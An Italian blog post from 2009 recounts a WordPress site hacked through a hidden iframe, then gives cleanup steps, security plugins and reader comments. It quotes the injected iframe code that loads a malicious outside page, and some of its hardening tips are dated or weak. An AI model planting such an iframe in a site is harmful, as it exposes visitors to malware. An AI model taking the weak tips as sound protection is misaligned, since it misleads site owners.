Ecco come mi hanno hackerato il blog

thief

IL FATTACCIO

Ho sempre dato scarso peso alla sicurezza del mio blog. Leggevo con interesse riguardo a plugin e precauzioni per tenerlo al sicuro, ma poi pensavo: “Ma figurati se un hacker viene nel mio blog che è piccolino e nato da poco. Gli hacker non se lo inculano il mio blog!”

Detto fatto. Oggi pomeriggio digito il mio url e mi compare un messaggio dell’antivirus (grande NOD32 ti amerò per sempre) che mi dice che il sito contiene un trojan e per sicurezza è stato bloccato. Eh??

Provo a fare un altro tentativo ma niente, l’antivirus continua a bloccare imperterrito. Però mi accorgo anche del fatto che quando tento di accedere al mio url, prima che l’antivirus lo blocchi, avviene una sorta di redirect verso uno strano indirizzo.

Allarmata e sconcertata mi rivolgo all’assistenza del mio hosting che, lesti e professionali come sempre, nel giro di cinque minuti mi confermano l’hackeraggio tramite un iframe e mi segnalano due file modificati nella cartella wp-includes di Wordpress.

Da quello che ho capito informandomi sul web, l’hacker ha sfruttato una falla PHP piuttosto comune e ha inserito il seguente codice nel file default-widgets.php:

1

<iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi73" width=125 height=125 style="visibility: hidden"></iframe>

In questo modo si apriva una pagina infetta in un iframe situato nella parte alta del mio blog e nascosto agli occhi degli utenti dall’attributo hidden. Fortunatamente il mio antivirus me l’ha prontamente segnalato e me ne sono accorta subito, ma lo scopo di questo tipo di hack è appunto quello di passare inosservato.
Se volete accertarvi che anche il vostro blog non vi riservi spiacevoli sorprese controllatelo con questo ottimo tool online: Unmask Parasites.

LA PULIZIA

Se a qualcuno capitasse o fosse capitata la stessa cosa ecco come ripulire il vostro blog:

  • Innanzi tutto una bella scansione anti-virus e anti-malware del pc su cui stiamo lavorando perchè c’è la possibilità che l’hacker sia riuscito a raggiungere anche il vostro computer.

  • Una volta che avrete verificato che il pc è pulito cambiate la password FTP.

  • Ora potete sostituire i file manomessi con quelli della vostra copia di backup (perchè voi la tenere sempre di scorta una copia di backup vero?!) oppure cancellare le righe aggiunte.

  • Rifare una scansione del sito con Unmask Parasites.

  • Accertatevi, sempre tramite Unmask Parasites (accanto alla voce Google cliccate il link details) che Google non si sia accorto della vostra infezione. Nel caso l’avesse scoperta richiedete una revisione attraverso il pannelo di Strumenti per i webmaster

LE PRECAUZIONI

Ora che avete ripulito tutto per benino, oppure se non vi siete mai posti il problema che un hacker possa incasinare il sito anche a voi, è giunto il momento di pensare col senno del poi ed installare qualcuno tra i seguenti plugin:

  • Wordpress DB Backup: Già dal primo istante in cui avete installato il vostro blog Wordpress avreste dovuto dotarlo di un plugin per il backup automatico. Se così non fosse però vi consiglio questo che è ottimo e vi permette di ricevere la vostra copia direttamente via email.

  • Wordpress file monitor: Di vitale importanza in casi come il mio, questo plugin vi segnala se sono stati modificati dei file e quali.

  • WP Security Scan: Scansiona il vostro blog alla ricerca di vulnerabilità nella password, nei permessi e nel database. Utilissimo.

  • WordPress Firewall Plugin: Il nome dice tutto, un firewall per il vostro blog. Da provare.

  • AskApache Password Protect: Questo plugin aggiunge un secondo strato di sicurezza impostando una password anche per la cartell wp-admin. Funziona scrivendo nel file .htaccess e cripta le password in .htpasswd.

  • Semisecure Login: Per aumentare la sicurezza nel processo di login al blog, questo plugin usa una cifratura MD5 della password e funziona tramite javascript.

E per finire in bellezza l’opera applichiamo questi due trucchetti segnalati da Guadagnare con un blog:

  • Mettete un file index.html in bianco nella cartella /plugins: Questa cartella infatti è accessibile in alcuni casi digitando nomedominio/wp-content/plugins. In questo modo si bloccherà l’accesso facendo visualizzare solo una pagina bianca.

  • Bloccate l’accesso a la cartella /wp-admin: Si può fare aggiungendo questa linea di codice al file robots.txt (potete crearlo voi e metterlo nella cartella principale del blog): 
    1

    Disallow: /wp-admin/
Ti è piaciuto l'articolo? Vota Ok oppure No. Grazie Mille!

Puoi votare l'articolo anche qui, gli articoli precedenti qui.

Ti è piaciuto l'articolo?! CONDIVIDILO

  • mail
  • twitter
  • technorati
  • delicious
  • facebook
  • friendfeed
  • stumbleupon

Altri articoli che potrebbero interessarti

commenti

  1. elisa
    19 giugno 2009

    Cara Lili, faremo tesoro della tua esperienza! Questi attacchi sono sempre in agguato.

    [ Quota ] Respond to elisa

  2. liliansi
    19 giugno 2009

    Almeno è servito a qualcosa allora dai :) Comunque l’errore è stato in primo luogo mio che ho sottovalutato il fattore sicurezza. Da oggi in poi il mio Wordpress sarà una botte di ferro :D

    [ Quota ] Respond to liliansi

  3. mazzjoe
    20 giugno 2009

    A mali estremi estremi rimedi! Ma anche un tema può avere una falla o addirittura codice malevolo. Ci sono script e plug-in che possono risolvere questo problema!

    [ Quota ] Respond to mazzjoe

  4. liliansi
    20 giugno 2009

    @mazzjoe: Ma il tema è mio, me lo son costruita da zero…spero proprio che non sia malevolo :D

    [ Quota ] Respond to liliansi

  5. Fabiola - women Blogging
    20 giugno 2009

    Grazie per aver condiviso la tua esperienza!! Ho del groviera da trasformare al più presto in botte di ferro! Proverò alcuni dei plugin che hai suggerito, grazie ancora! Ciao

    [ Quota ] Respond to Fabiola – women Blogging

  6. Nashis
    20 giugno 2009

    Non conoscevo il sito Unmask Parasites… ottima dritta. Ma se al posto della index bianca nella cartella plugins metto una index con una frase un po cattivella succede qualcosa?
    A parte gli scherzi sono tutti ottimi consigli :)

    [ Quota ] Respond to Nashis

  7. liliansi
    21 giugno 2009

    @Fabiola: Se questa esperienza può senrvire a sensibilizzare i blogger a stare più accorti riguardo alla sicurezza, forse è stata fin positiva :)

    @Nashis: Non ci avevo pensato a costruire una pagina con un messaggio :) Bella idea bravo, domani mi ci metto. ihihi

    [ Quota ] Respond to liliansi

  8. $ax
    23 giugno 2009

    Azz, domani mi mobilito per sistemare la sicurezza del mio blog.
    Grazie per la dritta Liliansi! ;)

    [ Quota ] Respond to $ax

  9. Postoditacco
    30 giugno 2009

    Post utilissimo!
    Mi spiace che per scriverlo tu abbia dovuto smadonnare sulla tua stessa pelle, però vedo che te la sei cavata egregiamente :)
    Roberto

    [ Quota ] Respond to Postoditacco

  10. liliansi
    30 giugno 2009

    @Postoditacco: Eh ma il merito è dei ragazzi di Hosting per Te…senza di loro ci avrei messo mesi per capire quali file erano stati hackerati :) Cmq guardo il lato positivo…ho imparato una lezione. Alla fine poteva andarmi molto peggio :)

    [ Quota ] Respond to liliansi

  11. Postoditacco
    30 giugno 2009

    Buono a sapersi in ogni caso: se deciderò di cambiare hosting, ne terrò sicuramente conto.
    Per ora ho i miei domini su Aruba.

    [ Quota ] Respond to Postoditacco

  12. maspe
    29 gennaio 2010

    E’ un articolo molto ben scritto! Per la sezione “precauzioni” penso che una protezione completa da attacchi non sia possibile ma ho trovato un sito http://www.ipsafer.com che permette di eseguire un controllo sugli IP, per sapere se sono pericolosi. Il servizio è GRATUITO e ci sono le istruzioni per modificare wordpress per eseguire il controllo stesso al momento dell’accesso.

    [ Quota ] Respond to maspe

  13. liliansi
    29 gennaio 2010

    @maspe: Non lo conoscevo! Grazie mille per la dritta :)

    [ Quota ] Respond to liliansi

Lasciami un commento!

Template by Liliansi. Powered by wordpress logo